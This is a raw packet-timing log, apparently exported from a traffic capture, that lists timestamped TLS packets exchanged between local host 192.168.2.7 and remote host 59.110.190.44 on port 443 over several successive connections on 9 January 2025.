                                            Jan 9, 2025 04:28:32.104980946 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.104996920 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.105000973 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.105010986 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.105022907 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.105050087 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.105055094 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.105098963 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.316834927 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.316946983 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.316958904 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.316970110 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.317008018 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.317576885 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.317617893 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.317636013 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.317645073 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.317658901 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.317677021 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.318090916 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.318145037 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.318322897 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.318375111 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319000959 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319057941 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319145918 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319189072 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319901943 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319935083 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319952965 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319958925 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.319969893 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.319994926 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.320610046 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.320664883 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.320777893 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.320827007 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.321491003 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.321542978 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.321573973 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.321628094 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.532617092 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.532675028 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.532691956 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.532711029 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.532722950 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.532751083 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.532823086 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.532874107 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533083916 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.533134937 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533154964 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.533196926 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533600092 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.533653975 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533755064 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.533799887 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.533999920 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.534045935 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.534143925 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.534198046 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.534202099 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.534241915 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.534243107 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.534290075 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.580327034 CET49682443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.580370903 CET4434968259.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.604470968 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.604532957 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:32.604624987 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.604839087 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:32.604856014 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:33.838246107 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:33.838345051 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:33.839112997 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:33.839126110 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:33.839406967 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:33.839411974 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.182432890 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.182459116 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.182548046 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.182565928 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.182617903 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.182997942 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.183053017 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.183053970 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.183064938 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.183096886 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.183119059 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.428556919 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.428708076 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.428760052 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.428814888 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.429265022 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.429397106 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.429450035 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.429466009 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.429481983 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.430152893 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.430207014 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.430219889 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.430255890 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.430258989 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.430273056 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.430299997 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.430325985 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.431282043 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.431343079 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.646708012 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.646807909 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.646836996 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.646869898 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.646887064 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.646915913 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.647236109 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.647284985 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.647419930 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.647470951 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.647608995 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.647653103 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.648204088 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.648258924 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.648394108 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.648453951 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.649137974 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.649203062 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.649214983 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.649221897 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.649245977 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.649256945 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.649413109 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.649467945 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.650099039 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.650137901 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.650151968 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.650163889 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.650176048 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.650197983 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.650895119 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.650954008 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.873430014 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.873512030 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.873560905 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.873605967 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.873758078 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.873802900 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.873965025 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874010086 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874221087 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874265909 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874351978 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874455929 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874489069 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874532938 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874892950 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874943018 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.874954939 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874973059 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.874996901 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.875026941 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.938842058 CET49683443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.938883066 CET4434968359.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.971976042 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.972028971 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:34.972155094 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.972371101 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:34.972388983 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.193969011 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.194051027 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.199845076 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.199856997 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.200026989 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.200032949 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.538960934 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539031982 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539083958 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539096117 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539120913 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539172888 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539546013 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539602041 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539609909 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539616108 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539645910 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539663076 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539666891 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539686918 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.539702892 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.539726019 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.541183949 CET49684443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.541197062 CET4434968459.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.553699970 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.553749084 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:36.553819895 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.554073095 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:36.554083109 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:37.800023079 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:37.800184965 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:37.800764084 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:37.800777912 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:37.800970078 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:37.800975084 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159580946 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159607887 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159708023 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.159739971 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159753084 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.159781933 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.159924984 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.159977913 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.160042048 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.160090923 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.381927013 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.382097960 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.382177114 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.382234097 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.382360935 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.382414103 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.383119106 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.383189917 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.384018898 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.384057045 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.384097099 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.384120941 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.384135008 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.384157896 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.384835005 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.384901047 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.609183073 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.609237909 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.609354973 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.609386921 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.609404087 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.609404087 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.609451056 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.609457016 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.609483957 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.609508991 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.609752893 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.609807014 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.610110044 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.610161066 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.610294104 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.610342979 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.610971928 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.611169100 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.611177921 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.611227036 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.611330986 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.611376047 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.611953974 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.612009048 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.612138033 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.612181902 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.612864971 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.612921000 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.613046885 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.613087893 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.613737106 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.613786936 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.825835943 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.825901031 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.825913906 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.825961113 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.826164007 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.826232910 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.826363087 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.826406002 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.826603889 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.826649904 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.826761961 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.826802015 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.826946020 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.827037096 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.827287912 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.827327013 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.827455044 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.827545881 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.827711105 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.827755928 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.827882051 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.827928066 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.828068018 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.828113079 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.828113079 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.828130960 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.828155994 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.828200102 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.828654051 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.828710079 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.828756094 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.828799009 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.828986883 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.829020977 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.829058886 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.829066038 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.829122066 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.829122066 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.829591036 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.829638004 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.829736948 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.829788923 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.829957962 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.829997063 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.829998016 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.830007076 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.830039024 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.830549002 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.830590963 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.830593109 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.830600977 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.830631018 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.830816031 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.830846071 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.830856085 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.830859900 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.830884933 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.830903053 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.912586927 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.912678003 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.912703037 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.912751913 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:38.912756920 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:38.912801027 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039021015 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039062977 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039100885 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039114952 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039124966 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039125919 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039153099 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039159060 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039180040 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039202929 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039273977 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039319992 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039397955 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039443970 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039526939 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039571047 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039685011 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039726019 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039813995 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039839029 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039853096 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039856911 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.039866924 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.039891958 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.040045977 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.040095091 CET49685443192.168.2.759.110.190.44
                                            Jan 9, 2025 04:28:39.040215015 CET4434968559.110.190.44192.168.2.7
                                            Jan 9, 2025 04:28:39.040266991 CET49685443192.168.2.759.110.190.44
